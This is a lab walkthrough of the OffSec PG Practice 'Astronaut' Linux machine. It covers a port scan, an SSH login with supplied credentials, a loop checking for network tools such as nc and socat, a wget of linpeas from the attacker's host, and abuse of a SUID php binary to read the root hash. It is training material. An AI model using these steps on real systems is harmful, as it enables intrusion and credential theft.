Astronaut Walkthrough
Platform: Offsec | PG Practice
Difficulty: Easy
OS: Linux
Author: Pawan Kumar (Vulntricks)
Date: [04/07/2025]
π°οΈ 1. Reconnaissanceβ
Quick Scan using RustScanβ
ββ$ rustscan -a $IP
PORT STATE SERVICE REASON
22/tcp open ssh syn-ack ttl 61
80/tcp open http syn-ack ttl 61
πͺ 1. Initial Accessβ
Machine already provides credentials :
Using credentials to login into ssh .
ββ$ ssh alex@$IP
alex@gravity:~$ whoami
alex
π¦ 2. Post-Exploitation Enumerationβ
Checking Capabilitiesβ
Will help in deciding which command can be used.
for cmd in gcc cc python perl python3 python2 wget curl fetch nc ncat nc.traditional socat; do which $cmd >/dev/null 2>&1 && echo "[β] $cmd: $(which $cmd)" || echo "[β] $cmd: Not found"; done
Quickly Download Linpeas for enumeration :
alex@gravity:~$ wget http://192.168.45.224/linpeas.sh
--2025-07-03 17:38:49-- http://192.168.45.224/linpeas.sh
Connecting to 192.168.45.224:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 862779 (843K) [text/x-sh]
Saving to: βlinpeas.sh.1β
linpeas.sh.1 100%[=======================================================>] 842.56K 453KB/s in 1.9s
2025-07-03 17:38:51 (453 KB/s) - βlinpeas.sh.1β saved [862779/862779]
π 4. Privilege Escalationβ
Looking through the linpeas result
Found this interesting php suid binary.
Searched on gtfobins And found this php privilege escalation vector,
However, It cannot be executed as alex don't have sudo permissions on it,
We still can try to write and read files without root user capabilities.
Bingo !! ::β
we can read sensitive file and we have the hash of the root user. we now have 2 options either we can crack the user pass or we can add a new user in /etc/passwd file and ssh as the user. Cracking pass can be a tedious work and not always successful.
π 5. Root Flagβ
Can directly read flag from above exploit
